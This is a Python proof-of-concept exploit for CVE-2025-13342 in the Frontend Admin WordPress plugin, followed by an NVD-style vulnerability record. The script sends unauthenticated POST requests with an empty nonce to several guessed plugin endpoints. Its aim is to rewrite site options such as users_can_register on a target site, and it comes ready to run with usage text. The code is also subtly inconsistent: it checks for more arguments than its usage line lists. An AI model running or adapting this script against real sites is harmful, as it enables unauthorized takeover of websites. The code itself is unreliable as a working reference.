CVE-2025-13342

import requests import sys # CVE-2025-13342 PoC - Unauthorized WordPress Options Modification # Target: Frontend Admin plugin for WordPress # Vulnerability: Missing capability check in ActionOptions::run() handler def exploit(target_url, target_option, option_value): """ Exploit the vulnerability by modifying WordPress options without authentication. Args: target_url: Base URL of the WordPress site target_option: The option name to modify (e.g., 'users_can_register') option_value: The new value for the option Returns: Response from the server """ # Endpoint for the frontend admin form (common paths) endpoints = [ '/frontend-admin-options-form/', '/?acf_frontend_options=save', '/wp-json/acf-frontend/v1/options' ] # Payload to modify WordPress options payload = { 'acf_form_id': 'frontend_options', 'option_name': target_option, 'option_value': option_value, 'action': 'acf_frontend_save_form', '_acf_nonce': '' # Empty nonce - vulnerability allows bypass } for endpoint in endpoints: try: url = target_url.rstrip('/') + endpoint response = requests.post(url, data=payload, timeout=10) if response.status_code == 200: print(f'[+] Successfully sent payload to {url}') print(f'[+] Attempting to modify {target_option} to {option_value}') return response except requests.RequestException as e: print(f'[-] Error targeting {url}: {e}') continue return None def main(): if len(sys.argv) < 5: print('Usage: python cve-2025-13342.py <target_url> <option> <value>') print('Example: python cve-2025-13342.py https://example.com users_can_register 1') sys.exit(1) target = sys.argv[1] option = sys.argv[2] value = sys.argv[3] print(f'[*] CVE-2025-13342 Exploit - Frontend Admin Plugin') print(f'[*] Target: {target}') print(f'[*] Modifying option: {option} to value: {value}') result = exploit(target, option, value) if result: print('[+] Exploit sent successfully') else: print('[-] Exploitation failed') if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-13342", "sourceIdentifier": "[email protected]", "published": "2025-12-03T13:16:02.007", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to unauthorized modification of arbitrary WordPress options in all versions up to, and including, 3.28.20. This is due to insufficient capability checks and input validation in the ActionOptions::run() save handler. This makes it possible for unauthenticated attackers to modify critical WordPress options such as users_can_register, default_role, and admin_email via submitting crafted form data to public frontend forms."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3400432/acf-frontend-form-element", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/613f2035-3061-429b-b218-83805287e4f3?source=cve", "source": "[email protected]"}]}}